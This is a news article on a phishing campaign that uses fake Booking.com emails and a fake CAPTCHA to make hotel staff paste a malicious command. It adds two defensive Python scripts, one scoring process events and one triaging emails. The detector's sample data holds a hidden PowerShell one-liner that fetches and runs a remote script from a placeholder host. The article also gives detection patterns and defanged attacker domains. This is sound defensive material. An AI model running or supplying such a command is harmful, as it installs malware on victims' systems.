Hackers use Booking.com scam to hijack hotels


Hotel staff who think they’re confirming a reservation might be booking themselves a front-row seat to a cyberattack instead.

It starts with a few emails. Nothing unusual – just routine booking confirmations from what looks like Booking.com. The hotel staff, used to the daily flood of reservations, might click it without a second thought.

Then comes the CAPTCHA screen. “Prove you’re human,” it says. What if they do so? Just like that, they might end up giving hackers access to their own systems.


Cybersecurity firm Malwarebytes has just identified a fresh phishing campaign targeting the hospitality industry. Hotels are a goldmine for cybercriminals.

Once inside, hackers can steal booking details, payment information, and even personal guest data – names, emails, credit card numbers, and possibly worse.

Access to one compromised network could mean attackers selling thousands of guest details on the dark web or even deploying ransomware to lock down the entire booking system until a ransom is paid.

How does the phishing scam work?

The scam starts with an email that looks exactly like it’s from Booking.com, asking hotels to confirm a guest’s reservation.

Clicking the link takes the victim to a near-perfect replica of a Booking.com login page – except there’s a “prove you’re human” CAPTCHA that pops up immediately. Seems normal, right? However, that’s the trap.

The CAPTCHA doesn’t verify anything – it copies a malicious command into the victim’s clipboard. Victims are then instructed to paste and run that command in Windows, which fetches and executes a remote script that installs a Trojan on the hotel’s system.

Letting in Trojan malware is dreadful: it is essentially the same as handing the attacker control of the entire hotel system.
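The "paste and run" step is the part a hotel's own telemetry can catch: a script host started straight from the Windows shell (the Run box or a prompt the user opened) with a URL and a download-and-execute primitive in its command line. The following is an added example, not code from Malwarebytes or from this article, that scores process-creation records against those traits. The record fields (image, parent_image, command_line) are assumed to come from a Sysmon Event ID 1 style source, and the three sample events, including the placeholder URL, are constructed.

```python
"""Heuristic detector for the 'paste and run' stage described above.

Added example, not from Malwarebytes or the article. Field names are assumed
to match a Sysmon-style process-creation event; sample events are constructed.
"""
import re

# Script hosts and download tools a pasted one-liner typically invokes.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# A child of explorer.exe means the user launched it (Run box, Start menu, desktop).
USER_LAUNCHERS = {"explorer.exe"}

URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
# Remote fetch or in-memory execution primitives.
REMOTE_FETCH_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|Net\.WebClient|Invoke-Expression|\biex\b|-urlcache|/transfer)",
    re.IGNORECASE)
# Flags that hide the console or obscure the command from the user.
HIDDEN_RE = re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b|-enc(odedcommand)?\b)",
                       re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    if image not in SCRIPT_HOSTS:
        return 0, reasons
    if parent in USER_LAUNCHERS:
        reasons.append("script host launched directly from explorer.exe (Run box / pasted command)")
    urls = URL_RE.findall(cmd)
    if urls:
        reasons.append("command line contains URL: " + ", ".join(urls))
    if REMOTE_FETCH_RE.search(cmd):
        reasons.append("remote fetch or in-memory execution primitive")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden-window, no-profile or encoded-command flags")
    return len(reasons), reasons


def flag_paste_and_run(events, threshold=2):
    """Return the events that reach the threshold, each with its reasons."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append({"event": ev, "score": score, "reasons": reasons})
    return flagged


# Constructed sample events; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {   # benign: staff open PowerShell from the Start menu
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe",
    },
    {   # suspicious: pasted one-liner that fetches and runs a remote script
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/x)"',
    },
    {   # benign: a scheduled task running a local batch file
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r"cmd /c C:\Scripts\backup.bat",
    },
]

if __name__ == "__main__":
    for hit in flag_paste_and_run(SAMPLE_EVENTS):
        print(hit["score"], hit["event"]["command_line"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The threshold of two keeps an ordinary "open PowerShell from the Start menu" event out of the alert queue while the pasted one-liner scores on all four traits; tune it against your own baseline before wiring it into an alert.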

Booking.com phishing scam
Source: Malwarebytes

What malicious URLs are used by the scam?

  • vencys[.]com – Used in the fake Booking.com emails.
  • bokcentrpart[.]com – Hosts the CAPTCHA trap that delivers the malicious code.
  • captpart[.]info – The final payload where the Trojan is downloaded.
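Hotel IT teams can turn the three indicators above, together with the "check the sender's domain" advice given later in the article, into a quick triage check on a suspect message. The following is an added example, not code from Malwarebytes or Cybernews: it pulls the sender domain and every link target out of an email, compares each against the legitimate booking.com domain and the published (defanged) indicators, and applies a simple brand-lookalike test. The sample email is constructed; only the three indicator domains come from the article, and the registrable-domain logic is a deliberate simplification (last two labels) rather than a full public-suffix lookup.

```python
"""Triage a suspected Booking.com-themed phishing email.

Added example, not Malwarebytes' or Cybernews' code. The IoC domains are the
three published with the campaign write-up; the sample email is constructed.
"""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

LEGIT_DOMAINS = {"booking.com"}

# Defanged indicators as published; refang() restores the dots for comparison.
PUBLISHED_IOCS = ["vencys[.]com", "bokcentrpart[.]com", "captpart[.]info"]


def refang(domain):
    return domain.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in PUBLISHED_IOCS}


def registrable(hostname):
    """Crude eTLD+1: the last two labels. Fine for .com/.info, wrong for
    country second-level domains such as .co.uk (assumption for this example)."""
    labels = hostname.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else hostname.lower()


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character brand variants."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like_brand(hostname, brand="booking"):
    """True if any label borrows the brand token or sits within two edits of it."""
    if registrable(hostname) in LEGIT_DOMAINS:
        return False
    for label in hostname.lower().split("."):
        if brand in label:
            return True
        if len(label) >= 5 and edit_distance(label, brand) <= 2:
            return True
    return False


def classify(hostname):
    reg = registrable(hostname)
    if reg in LEGIT_DOMAINS:
        return "legit"
    if reg in IOC_DOMAINS or hostname.lower() in IOC_DOMAINS:
        return "known-ioc"
    if looks_like_brand(hostname):
        return "lookalike"
    return "unknown"


class LinkExtractor(HTMLParser):
    """Collect href targets from <a> tags in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def triage(raw_email):
    """Classify the sender domain and each link; verdict is 'clean' only if all are legit."""
    msg = message_from_string(raw_email)
    _, sender = parseaddr(msg.get("From", ""))
    sender_domain = sender.rsplit("@", 1)[-1].lower() if "@" in sender else ""
    extractor = LinkExtractor()
    extractor.feed(msg.get_payload())
    links = []
    for href in extractor.hrefs:
        host = urlparse(href).hostname or ""
        links.append((href, host, classify(host)))
    sender_verdict = classify(sender_domain)
    suspicious = sender_verdict != "legit" or any(v != "legit" for _, _, v in links)
    return {"sender": (sender_domain, sender_verdict), "links": links,
            "verdict": "suspicious" if suspicious else "clean"}


# Constructed sample message: sender local part, paths and the lookalike are made up.
SAMPLE_EMAIL = """\
From: "Booking.com Partner Support" <noreply@vencys.com>
To: frontdesk@hotel.example
Subject: Action required: confirm reservation
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please confirm the guest reservation within 24 hours.</p>
<a href="https://bokcentrpart.com/confirm?id=PLACEHOLDER">Confirm reservation</a>
<a href="https://admin.booking.com/">Extranet login</a>
<a href="https://booking-verify.example/login">Verify account</a>
</body></html>
"""

if __name__ == "__main__":
    result = triage(SAMPLE_EMAIL)
    print("sender:", result["sender"])
    for href, host, verdict in result["links"]:
        print(f"{verdict:10} {host:28} {href}")
    print("verdict:", result["verdict"])
```

One legitimate link in the message does not rescue it: the verdict stays "suspicious" as long as the sender or any link is off-brand, which matches the article's advice to go to the real site manually rather than trust anything in the email.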

Booking.com is often used for phishing scams

Scammers have long viewed Booking.com as a prime target for their schemes. Reddit users, often the first to uncover new scams, have been buzzing with posts about how Booking.com phishing attacks are becoming almost routine.

“I keep getting verification link emails from Booking.com in my work email, but I have never signed in/signed up for it,” wrote one Reddit user, whose email might have been leaked and targeted by the scammers.

Another Reddit user described a perfectly executed phishing scam they almost fell for. They received an email from what looked like “[email protected],” complete with all their reservation details.

It claimed they needed to enter their credit card info through a link to “validate” the booking. The email was clear: “Fail to provide your card details, and you’ll lose your reservation.”

In a panic, they entered their information, thinking they were just confirming a payment. The email even promised that the charge would be refunded “in a few seconds.” But nothing happened.


Soon after, they noticed a second charge attempt on their card. Lucky for them, they caught it before it went through, but it was a close call.


How to avoid phishing scams?

  • Never trust urgent emails. If Booking.com really needs you to confirm something, log into the site manually.
  • Check the email sender’s domain. If it’s not booking.com, it’s probably scammers.
  • Don’t click suspicious links. If a link in an email is telling you to verify something, it’s probably a scam.
  • NEVER run copied commands in Windows unless you know what they do. If someone is telling you to paste code into a command prompt, they’re probably hacking you.
  • Use security training for hotel staff. Teach employees to recognize social engineering attacks before they happen.